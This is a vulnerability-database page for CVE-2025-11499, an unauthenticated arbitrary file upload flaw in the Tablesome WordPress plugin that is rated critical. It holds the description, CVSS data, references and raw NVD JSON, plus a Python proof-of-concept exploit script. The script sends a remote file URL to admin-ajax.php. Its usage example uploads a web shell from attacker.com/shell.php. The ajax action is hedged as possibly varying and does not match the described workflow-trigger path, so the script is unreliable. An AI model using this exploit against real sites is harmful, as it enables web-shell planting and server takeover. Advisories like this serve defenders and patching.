Security Vulnerability Report
CVE-2025-11499 CVSS 9.8 CRITICAL

CVE-2025-11499

Published: 2025-11-01 07:15:35
Last Modified: 2026-04-15 00:35:42

Description

The Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the set_featured_image_from_external_url() function in all versions up to, and including, 1.1.32. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible in configurations where unauthenticated users have been provided with a method for adding featured images, and the workflow trigger is created.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Tablesome WordPress Plugin <= 1.1.32

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-11499 PoC - Arbitrary File Upload in Tablesome WordPress Plugin
# Target: WordPress site with Tablesome plugin <= 1.1.32


def exploit(target_url, attacker_file_url):
    """
    Exploit the arbitrary file upload vulnerability in Tablesome plugin.

    Args:
        target_url: Base URL of the vulnerable WordPress site
        attacker_file_url: URL of the malicious file to upload

    Note: Requires a workflow trigger to be created and external URL feature enabled
    """
    # Endpoint for setting featured image from external URL
    endpoint = f"{target_url}/wp-admin/admin-ajax.php"

    # Construct the malicious request
    data = {
        'action': 'tablesome_set_featured_image',
        'image_url': attacker_file_url,
        'post_id': 1,  # May vary depending on configuration
    }

    try:
        response = requests.post(endpoint, data=data, timeout=30)
        if response.status_code == 200:
            print("[+] Request sent successfully")
            print(f"[+] Response: {response.text}")
            # If successful, the malicious file will be uploaded to /wp-content/uploads/
            return True
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-11499.py <target_url> <malicious_file_url>")
        print("Example: python cve-2025-11499.py http://example.com http://attacker.com/shell.php")
        sys.exit(1)
    target = sys.argv[1]
    malicious_file = sys.argv[2]
    exploit(target, malicious_file)
```

References

https://plugins.trac.wordpress.org/browser/tablesome/trunk/workflow-library/actions/wp-post-creation.php#L309
https://plugins.trac.wordpress.org/changeset/3386484/tablesome/trunk/workflow-library/actions/wp-post-creation.php
https://www.wordfence.com/threat-intel/vulnerabilities/id/2be770c7-7aa2-430b-981d-5d81fe068bef?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11499",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-01T07:15:34.940",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the set_featured_image_from_external_url() function in all versions up to, and including, 1.1.32. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible in configurations where unauthenticated users have been provided with a method for adding featured images, and the workflow trigger is created."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/tablesome/trunk/workflow-library/actions/wp-post-creation.php#L309",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3386484/tablesome/trunk/workflow-library/actions/wp-post-creation.php",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2be770c7-7aa2-430b-981d-5d81fe068bef?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```